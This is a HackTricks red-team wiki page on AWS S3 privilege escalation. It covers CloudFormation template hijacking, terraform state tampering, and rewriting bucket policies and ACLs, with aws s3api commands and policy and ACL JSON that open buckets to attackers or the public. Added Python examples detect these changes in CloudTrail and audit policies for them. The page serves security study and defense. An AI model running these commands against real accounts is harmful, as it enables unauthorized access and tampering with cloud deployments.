AWS - S3 Privesc
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
S3
s3:PutBucketNotification, s3:PutObject, s3:GetObject
An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.
For example, an attacker with those permissions over the cloudformation bucket called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:PutBucketNotification",
        "s3:GetBucketNotification",
        "s3:PutObject",
        "s3:GetObject"
      ],
      "Resource": [
        "arn:aws:s3:::cf-templates-*/*",
        "arn:aws:s3:::cf-templates-*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": "s3:ListAllMyBuckets",
      "Resource": "*"
    }
  ]
}
The hijack is possible because there is a small time window between the moment the template is uploaded to the bucket and the moment the template is deployed. An attacker only needs to create a lambda function in his own account that is triggered when the bucket notification is sent, and use it to tamper with the content of that bucket.
The Pacu module cfn__resource_injection can be used to automate this attack.
For more info check the original research: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
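From the defender's side, every step of the paths on this page (the notification hook on a cf-templates bucket, the policy and ACL changes below, a write to a terraform state file) is an S3 management or data event in CloudTrail. The following added example, which is not part of the original page or of Pacu, scans CloudTrail records for those events and raises the severity when the target is a deployment artefact; the records, the user ARN and the bucket "tf-state-bucket" are constructed.

```python
# Constructed CloudTrail records (not real log data) in the field layout
# CloudTrail uses; all four are by one hypothetical user for brevity.
ACTOR = {"arn": "arn:aws:iam::111111111111:user/dev"}
SAMPLE_EVENTS = [
    {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketNotification", "userIdentity": ACTOR,
     "requestParameters": {"bucketName": "cf-templates-nohnwfax6a6i-us-east-1"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketPolicy", "userIdentity": ACTOR,
     "requestParameters": {"bucketName": "somebucketname"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject", "userIdentity": ACTOR,
     "requestParameters": {"bucketName": "tf-state-bucket", "key": "prod/terraform.tfstate"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject", "userIdentity": ACTOR,
     "requestParameters": {"bucketName": "somebucketname", "key": "readme.txt"}},
]

# Management-plane calls that change who can read, write or be notified about
# a bucket; each one is a step in an escalation path described on this page.
SENSITIVE_EVENTS = {"PutBucketNotification", "PutBucketPolicy",
                    "PutBucketAcl", "PutObjectAcl"}
# Deployment artefacts worth a higher severity: CloudFormation template upload
# buckets and terraform state files (PutObject needs S3 data-event logging).
HIGH_VALUE_BUCKET_PREFIXES = ("cf-templates-",)
HIGH_VALUE_KEY_SUFFIXES = (".tfstate",)


def classify(event):
    """Return (severity, reason) for one record, or None if it is benign."""
    if event.get("eventSource") != "s3.amazonaws.com":
        return None
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    bucket, key = params.get("bucketName", ""), params.get("key", "")
    if name in SENSITIVE_EVENTS:
        sev = "high" if bucket.startswith(HIGH_VALUE_BUCKET_PREFIXES) else "medium"
        return sev, f"{name} on {bucket}"
    if name == "PutObject" and key.endswith(HIGH_VALUE_KEY_SUFFIXES):
        return "high", f"state file overwritten: {bucket}/{key}"
    return None


def scan(events):
    """Return one alert dict per record that matches a rule."""
    alerts = []
    for ev in events:
        hit = classify(ev)
        if hit:
            alerts.append({"severity": hit[0], "reason": hit[1],
                           "actor": ev.get("userIdentity", {}).get("arn")})
    return alerts
```

Feed it the records of a CloudTrail log file (one JSON object per entry of the "Records" array) to get the same alerts over real data.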
s3:PutObject, s3:GetObject
These are the permissions to get and upload objects to S3. Several services inside AWS (and outside of it) use S3 storage to store config files.
An attacker with read access to them might find sensitive information in them.
An attacker with write access could modify the data to abuse some service and try to escalate privileges.
These are some examples:
- If an EC2 instance is storing its user data in an S3 bucket, an attacker could modify it to execute arbitrary code inside the EC2 instance.
s3:PutObject, s3:GetObject (optional) over the terraform state file
It is very common for terraform state files to be stored in the blob storage of cloud providers, e.g. AWS S3. The file extension of the state file is .tfstate, and bucket names often also indicate that they contain terraform state files. Usually, each AWS account has one such bucket to store the state files that describe the state of the account.
Also commonly, in real-world accounts almost all developers have s3:* and sometimes even business users have s3:Put*.
So, if you have the listed permissions over these files, there is an attack path that lets you get RCE in the pipeline with the terraform privileges, often AdministratorAccess, making you admin of the cloud account. You could also use that path to run a denial of service attack by making terraform delete legitimate resources.
Follow the instructions in the Terraform State Files Compromise section of the Terraform Security page for the exploitation code:
s3:PutBucketPolicy
An attacker with this permission, who needs to be from the same account (otherwise the error "The specified method is not allowed" is triggered), will be able to grant himself more permissions over the bucket(s), allowing him to read, write, modify, delete and expose buckets.
# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and maintaining some previous root access
{
  "Id": "Policy1568185116930",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123123123123:root"
      },
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::somebucketname"
    },
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::123123123123:user/username"
      },
      "Action": "s3:*",
      "Resource": "arn:aws:s3:::somebucketname/*"
    }
  ]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
  "Id": "Policy1568185116930",
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Stmt1568184932403",
      "Action": [
        "s3:ListBucket"
      ],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::welcome",
      "Principal": "*"
    },
    {
      "Sid": "Stmt1568185007451",
      "Action": [
        "s3:GetObject"
      ],
      "Effect": "Allow",
      "Resource": "arn:aws:s3:::welcome/*",
      "Principal": "*"
    }
  ]
}
s3:GetBucketAcl, s3:PutBucketAcl
An attacker could abuse these permissions to grant himself more access over specific buckets.
Note that the attacker doesn't need to be from the same account. Moreover, write access
# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

## JSON ACL example
## Make sure to modify the Owner's DisplayName and ID according to the bucket ACL you retrieved.
{
  "Owner": {
    "DisplayName": "<DisplayName>",
    "ID": "<ID>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
s3:GetObjectAcl, s3:PutObjectAcl
An attacker could abuse these permissions to grant himself more access over specific objects inside the bucket.
# Update bucket object ACL
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

## JSON ACL example
## Make sure to modify the Owner's DisplayName and ID according to the Object ACL you retrieved.
{
  "Owner": {
    "DisplayName": "<DisplayName>",
    "ID": "<ID>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
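The bucket policy and ACL documents shown in the s3:PutBucketPolicy and ACL sections are exactly what `aws s3api get-bucket-policy` / `get-bucket-acl` return, so the same documents can be audited for the conditions those sections rely on. The following added example, not part of the original page, does that offline: it flags Allow statements with a wildcard principal, a principal from another account, or broad write actions (s3:* or s3:Put*) to a same-account principal, and ACL grants to the AllUsers / AuthenticatedUsers groups; the inputs are constructed copies of the page's documents and the owner account id is assumed.

```python
# Constructed inputs modelled on the bucket policy and ACL documents shown on
# this page; nothing here is read from a real account.
POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:ListBucket"],
     "Resource": "arn:aws:s3:::welcome", "Principal": "*"},
    {"Effect": "Allow", "Action": "s3:*", "Resource": "arn:aws:s3:::welcome/*",
     "Principal": {"AWS": "arn:aws:iam::123123123123:user/username"}}]}
ACL = {"Owner": {"DisplayName": "<DisplayName>", "ID": "<ID>"}, "Grants": [
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
     "Permission": "FULL_CONTROL"}]}
# Predefined groups: AllUsers is anonymous, AuthenticatedUsers is any AWS
# account holder; a grant to either is public in practice.
WORLD_GROUPS = {"http://acs.amazonaws.com/groups/global/AllUsers",
                "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _account_of(principal):
    """Account ID from an ARN principal; None for '*' or service principals."""
    parts = principal.split(":")
    return parts[4] if len(parts) > 4 else None


def audit_policy(policy, owner_account):
    """Flag Allow statements that are public, cross-account, or broad-write."""
    findings = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action", []))
        broad = any(a in ("*", "s3:*") or a.startswith("s3:Put") for a in actions)
        principal = st.get("Principal", {})
        names = ["*"] if principal == "*" else [
            p for v in principal.values() for p in _as_list(v)]
        for pr in names:
            acct = _account_of(pr)
            if pr == "*":
                findings.append(("public", actions))
            elif acct is not None and acct != owner_account:
                findings.append(("cross-account", pr))
            elif broad:
                findings.append(("broad-write", pr))
    return findings


def audit_acl(acl):
    """Return (group URI, permission) for grants to the predefined world groups."""
    return [(g["Grantee"]["URI"], g["Permission"]) for g in acl.get("Grants", [])
            if g["Grantee"].get("Type") == "Group"
            and g["Grantee"].get("URI") in WORLD_GROUPS]
```

Any "public" or world-group finding on a bucket that is not meant to be public is a sign of the PutBucketPolicy / PutBucketAcl abuse described above; a broad-write grant to an individual user is the kind of over-permissioning that enables the terraform state and config-file paths.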
s3:GetObjectAcl, s3:PutObjectVersionAcl
An attacker with these permissions is expected to be able to put an ACL on a specific version of an object.
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json